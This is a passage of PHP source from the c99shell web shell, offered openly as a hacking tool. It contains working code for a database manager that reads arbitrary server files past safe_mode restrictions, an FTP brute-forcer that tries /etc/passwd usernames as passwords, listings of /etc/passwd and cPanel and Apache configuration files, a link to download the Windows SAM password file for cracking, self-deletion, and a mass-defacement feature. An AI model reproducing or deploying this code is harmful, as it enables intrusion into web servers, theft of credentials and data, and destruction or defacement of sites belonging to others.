636 echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
637 $i++;
638}
639echo "&nbsp;&nbsp;&nbsp;";
640if (is_writable($d))
641{
642 $wd = true;
643 $wdt = "<font color=\"green\">[ ok ]</font>";
644 echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
645}
646else
647{
648 $wd = false;
649 $wdt = "<font color=\"red\">[ Read-Only ]</font>";
650 echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
651}
652$free = diskfreespace($d);
653if (!$free) {$free = 0;}
654$all = disk_total_space($d);
655if (!$all) {$all = 0;}
656$used = $all-$free;
657$used_percent = round(100/($all/$free),2);
658echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
659if (count($quicklaunch) > 0)
660{
661 foreach($quicklaunch as $item)
662 {
663  $item[1] = str_replace("%d",urlencode($d),$item[1]);
664  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
665  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
666 }
667}
668$letters = "";
669if ($win)
670{
671 $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
672 $v = explode("/",$d);
673 $v = $v[0];
674 foreach ($abc as $letter)
675 {
676  if (is_dir($letter.":/"))
677  {
678   if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
679   else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
680  }
681 }
682 if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
683}
684?></p></td></tr></table><br><?php
685if ((!empty($donated_html)) and (in_array($act,$donated_act)))
686{
687 ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
688}
689?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
690if ($act == "") {$act = $dspact = "ls";}
691if ($act == "sql")
692{
693 $sql_surl = $surl."act=sql";
694 if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
695 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
696 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
697 if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
698 if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
699 $sql_surl .= "&";
700 ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
701 if ($sql_server)
702 {
703  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
704  $err = mysql_error();
705  @mysql_select_db($sql_db,$sql_sock);
706  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
707 }
708 else {$sql_sock = false;}
709 echo "<b>SQL Manager:</b><br>";
710 if (!$sql_sock)
711 {
712  if (!$sql_server) {echo "NO CONNECTION";}
713  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
714 }
715 else
716 {
717  $sqlquicklaunch = array();
718  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
719  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
720  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
721  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
722  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
723  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
724  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
725 
726  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
727
728  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
729  echo "</center>";
730 }
731 echo "</td></tr><tr>";
732 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
733 else
734 {
735  //Start left panel
736  if (!empty($sql_db))
737  {
738   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
739   $result = mysql_list_tables($sql_db);
740   if (!$result) {echo mysql_error();}
741   else
742   {
743    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
744    $c = 0;
745    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
746"; mysql_free_result($count); $c++;}
747    if (!$c) {echo "No tables found in database.";}
748   }
749  }
750  else
751  {
752   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
753   $result = mysql_list_dbs($sql_sock);
754   if (!$result) {echo mysql_error();}
755   else
756   {
757    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
758    echo "<option value=\"\">Databases (...)</option>
759";
760    $c = 0;
761    while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
762"; $c++;}
763   }
764   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
765  }
766  //End left panel
767  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
768  //Start center panel
769  if ($sql_db)
770  {
771   echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
772   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
773   echo "</b></center>";
774
775   $acts = array("","dump");
776
777   if ($sql_act == "query")
778   {
779    echo "<hr size=\"1\" noshade>";
780    if ($submit)
781    {
782     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
783    }
784    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
785    if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
786   }
787   if (in_array($sql_act,$acts))
788   {
789    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
790    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
791    if ($sql_act == "newtpl")
792    {
793     echo "<b>";
794     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
795    }
796    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
797   }
798   elseif ($sql_act == "dump")
799   {
800    $set = array();
801    $set["sock"] = $sql_sock;
802    $set["db"] = $sql_db;
803    $dump_out = "print";               
804    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
805    elseif ($dump_out == "download")
806    {
807     @ob_clean();
808     header("Content-type: c99shell");
809     header("Content-disposition: attachment; filename=\"".$f."\";"); 
810     $set["print"] = 1;
811     $set["nl2br"] = 1;
812    }
813    $set["file"] = $dump_file;
814    $set["add_drop"] = true;
815    $ret = mysql_dump($set);
816    if ($dump_out == "download") {exit;}
817   }
818   else
819   {
820    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
821    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
822    echo "<tr>";
823    echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
824    echo "<td><center><b>Table</b></center></td>";
825    echo "<td><b>Rows</b></td>";
826    echo "<td><b>Type</b></td>";
827    echo "<td><b>Created</b></td>";
828    echo "<td><b>Modified</b></td>";
829    echo "<td><b>Size</b></td>";
830    echo "<td><b>Action</b></td>";
831    echo "</tr>";
832    $i = 0;
833    $tsize = $trows = 0;
834    while ($row = mysql_fetch_array($result, MYSQL_NUM))
835    {
836     $tsize += $row["5"];
837     $trows += $row["5"];
838     $size = view_size($row["5"]);
839     echo "<tr>";
840     echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
841     echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
842     echo "<td>".$row[3]."</td>";
843     echo "<td>".$row[1]."</td>";
844     echo "<td>".$row[10]."</td>";
845     echo "<td>".$row[11]."</td>";
846     echo "<td>".$size."</td>";
847     echo "<td>
848&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
849&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
850<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
851</td>";
852     echo "</tr>";
853     $i++;
854    }
855    echo "<tr bgcolor=\"000000\">";
856    echo "<td><center><b>»</b></center></td>";
857    echo "<td><center><b>".$i." table(s)</b></center></td>";
858    echo "<td><b>".$trows."</b></td>";
859    echo "<td>".$row[1]."</td>";
860    echo "<td>".$row[10]."</td>";
861    echo "<td>".$row[11]."</td>";
862    echo "<td><b>".view_size($tsize)."</b></td>";
863    echo "<td></td>";
864    echo "</tr>";
865    echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
866<option>With selected:</option>
867<option value=\"drop\" >Drop</option>
868<option value=\"empty\" >Empty</option>
869<option value=\"chk\">Check table</option>
870<option value=\"Optimize table\">Optimize table</option>
871<option value=\"Repair table\">Repair table</option>
872<option value=\"Analyze table\">Analyze table</option>
873</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
874    mysql_free_result($result);
875   }
876  }
877  }
878  else
879  {
880   $acts = array("","newdb","serverstat","servervars","processes","getfile");
881   if (in_array($sql_act,$acts))
882   {
883    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
884   }
885   if (!empty($sql_act))
886   {
887    echo "<hr size=\"1\" noshade>";
888    if ($sql_act == "newdb")
889    {
890     echo "<b>";
891     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
892     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
893    }
894    if ($sql_act == "serverstatus")
895    {
896     $result = mysql_query("SHOW STATUS", $sql_sock); 
897     echo "<center><b>Server-status variables:</b><br><br>";
898     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
899     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
900     echo "</table></center>";
901     mysql_free_result($result);
902    }
903    if ($sql_act == "servervars")
904    {
905     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
906     echo "<center><b>Server variables:</b><br><br>";
907     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
908     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
909     echo "</table>";
910     mysql_free_result($result);
911    }
912    if ($sql_act == "processes")
913    {
914     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
915     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
916     echo "<center><b>Processes:</b><br><br>";
917     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
918     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
919     echo "</table>";
920     mysql_free_result($result);
921    }
922    elseif (($sql_act == "getfile"))
923    {
924     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
925     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
926     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
927     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
928     else
929     {
930      for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
931      $f = ""; 
932      while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
933      if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
934      else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
935     }
936     mysql_free_result($result);
937     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
938     }
939    }
940   }
941  }
942 }
943 echo "</tr></table></table>";
944}
945if ($act == "mkdir")
946{
947 if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
948 echo "<br><br>";
949 $act = $dspact = "ls";
950}
951if ($act == "ftpquickbrute")
952{
953 echo "<b>Ftp Quick brute:</b><br>";
954 if ($win) {echo "This functions not work in Windows!<br><br>";}
955 else
956 {
957  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
958  {
959   if ($fqb_onlywithsh)
960   {
961    if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
962    else {$true = true;}
963   }
964   else {$true = true;}
965   if ($true)
966   {
967    $sock = @ftp_connect($host,$port,$timeout);
968    if (@ftp_login($sock,$login,$pass))
969    {
970     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
971     ob_flush();
972     return true;
973    }
974   }
975  }
976  if (!empty($submit))
977  {
978   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
979   $fp = fopen("/etc/passwd","r");
980   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
981   else
982   {
983    ob_flush();
984    $i = $success = 0;
985    $ftpquick_st = getmicrotime();
986    while(!feof($fp))
987    { 
988     $str = explode(":",fgets($fp,2048));
989     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
990     {
991      $success++;
992     }
993     if ($i > $fqb_lenght) {break;}
994     $i++;
995    } 
996    if ($success == 0) {echo "No success. connections!";}
997    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
998    echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
999   }
1000  }
1001  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
1002 }
1003}
1004if ($act == "lsa")
1005{
1006 echo "<center><b>Server security information:</b></center>";
1007 echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
1008 echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
1009 echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
1010 if (!$win)
1011 {
1012  if ($nixpasswd)
1013  {
1014   if ($nixpasswd == 1) {$nixpasswd = 0;}
1015   $num = $nixpasswd + $nixpwdperpage;
1016   echo "<b>*nix /etc/passwd:</b><br>";
1017   $i = $nixpasswd;
1018   while ($i < $num)
1019   {
1020    $uid = posix_getpwuid($i);
1021    if ($uid) {echo join(":",$uid)."<br>";}
1022    $i++;
1023   }
1024  }
1025  else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
1026  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
1027  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
1028  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1029  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1030 }
1031 else
1032 {
1033  $v = $_SERVER["WINDIR"]."\repair\sam";
1034  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
1035  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
1036 }
1037}
1038if ($act == "mkfile")
1039{
1040 if ($mkfile != $d)
1041 {
1042  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
1043  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
1044  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
1045 }
1046 else {$act = $dspact = "ls";}
1047}
1048if ($act == "fsbuff")
1049{
1050 $arr_copy = $sess_data["copy"];
1051 $arr_cut = $sess_data["cut"];
1052 $arr = array_merge($arr_copy,$arr_cut);
1053 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
1054 else
1055 {
1056  echo "<b>File-System buffer</b><br><br>";
1057  $ls_arr = $arr;
1058  $disp_fullpath = true;
1059  $act = "ls";
1060 }
1061}
1062if ($act == "selfremove")
1063{
1064 if (!empty($submit))
1065 {
1066  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
1067  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1068 }
1069 else
1070 {
1071  $v = array();
1072  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
1073  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
1074  shuffle($v);
1075  $v = join("&nbsp;&nbsp;&nbsp;",$v);
1076  echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
1077 }
1078}
1079if ($act == "massdeface")
1080{
1081 if (empty($deface_in)) {$deface_in = $d;}
1082 if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
1083 if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
1084
1085 if (!empty($submit))
1086 {
1087  $found = array();
1088  $found_d = 0;
1089  $found_f = 0;
1090
1091  $text = $deface_text;
1092  $text_regexp = $deface_text_regexp;
1093  if (empty($text)) {$text = " "; $text_regexp = 1;}
1094
1095  $a = array
1096  (
1097   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
1098   "text"=>$text, "text_regexp"=>$text_regxp,
1099   "text_wwo"=>$deface_text_wwo,
1100   "text_cs"=>$deface_text_cs,
1101   "text_not"=>$deface_text_not
1102  );
1103  $defacetime = getmicrotime();
1104  $in = array_unique(explode(";",$deface_in));
1105  foreach($in as $v) {c99fsearch($v);}
1106  $defacetime = round(getmicrotime()-$defacetime,4);
1107  if (count($found) == 0) {echo "<b>No files found!</b>";}
1108  else
1109  {
1110   $ls_arr = $found;
1111   $disp_fullpath = true;
1112   $act = $dspact = "ls";
1113  }
1114 }
1115 else
1116 {
1117  if (empty($deface_preview)) {$deface_preview = 1;}
1118  if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
1119 }
1120 echo "<form method=\"POST\">";
1121 if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
1122 echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
1123<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
1124<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
1125<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
1126<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
1127&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
1128&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
